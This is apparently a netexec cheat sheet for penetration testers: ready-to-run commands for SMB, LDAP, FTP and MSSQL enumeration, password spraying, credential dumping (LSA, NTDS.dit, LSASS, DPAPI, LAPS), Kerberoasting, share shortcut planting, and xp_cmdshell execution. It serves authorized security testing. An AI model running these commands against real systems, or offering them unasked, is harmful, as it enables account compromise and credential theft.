netexec

smb

initial enumeration

netexec smb target

null authentication

netexec smb target -u '' -p ''

guest authentication

netexec smb target -u 'guest' -p ''

list shares

netexec smb target -u '' -p '' --shares
netexec smb target -u username -p password --shares

list usernames

netexec smb target -u '' -p '' --users
netexec smb target -u '' -p '' --rid-brute
netexec smb target -u username -p password --users

local authentication

netexec smb target -u username -p password --local-auth

using kerberos

netexec smb target -u username -p password -k

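password spray (one password tried against many accounts; every miss is a failed logon that counts toward the lockout threshold reported by --pass-pol, and defenders see it as failed logons, event 4625 / 4771, for many accounts from one source)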

netexec smb target -u users.txt -p password --continue-on-success
netexec smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-success
netexec ssh target -u username -p password --continue-on-success

all in one

netexec smb target -u username -p password --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol

spider_plus module (the second command below is the same --get-file download listed under "dump a specific file")

netexec smb target -u username -p password -M spider_plus
netexec smb target -u username -p password -k --get-file target_file output_file --share sharename

dump a specific file

netexec smb target -u username -p password -k --get-file target_file output_file --share sharename

dump lsa secrets

netexec smb target -u username -p password --local-auth --lsa

group policy preferences

netexec smb target -u username -p password -M gpp_password

dump laps v1 and v2 password

netexec smb target -u username -p password --laps

dump dpapi credentials

netexec smb target -u username -p password --laps --dpapi

dump ntds.dit

netexec smb target -u username -p password --ntds

webdav - checks whether the webclient service is running on the target

netexec smb ip -u username -p password -M webdav 

veeam - extracts credentials from local veeam sql database

netexec smb target -u username -p password -M veeam

slinky - creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions

netexec smb ip -u username -p password -M slinky 

ntdsutil - dump ntds with ntdsutil

netexec smb ip -u username -p password -M ntdsutil

dump lsass

netexec smb target -u username -p password -M lsassy

retrieve msol account password

netexec smb target -u username -p password -M msol

ftp

list folders and files

netexec ftp target -u username -p password --ls

list files inside a folder

netexec ftp target -u username -p password --ls folder_name

retrieve a specific file

netexec ftp target -u username -p password --ls folder_name --get file_name

ldap

enumerate users using ldap

netexec ldap target -u '' -p '' --users

all in one

netexec ldap target -u username -p password --trusted-for-delegation  --password-not-required --admin-count --users --groups

kerberoast

netexec ldap target -u username -p password --kerberoasting kerb.txt

asreproast

netexec ldap target -u username -p password --asreproast asrep.txt

gmsa

netexec ldap target -u username -p password --gmsa-convert-id id
netexec ldap domain -u username -p password --gmsa-decrypt-lsa gmsa_account

check the machine account quota

netexec ldap target -u username -p password -M maq

adcs enumeration

netexec ldap target -u username -p password -M adcs

bloodhound

netexec ldap target -u username -p password --bloodhound -ns ip --collection All

mssql

authentication

netexec mssql target -u username -p password

execute commands using xp_cmdshell

netexec mssql target -u username -p password -x command_to_execute

-X runs the command through powershell; -x runs it through cmd

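get a file (the two path placeholders here are in the opposite order to the smb --get-file example above; confirm the expected order with `netexec mssql --help`)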

netexec mssql target -u username -p password --get-file output_file target_file

source: https://github.com/seriotonctf/cme-nxc-cheat-sheet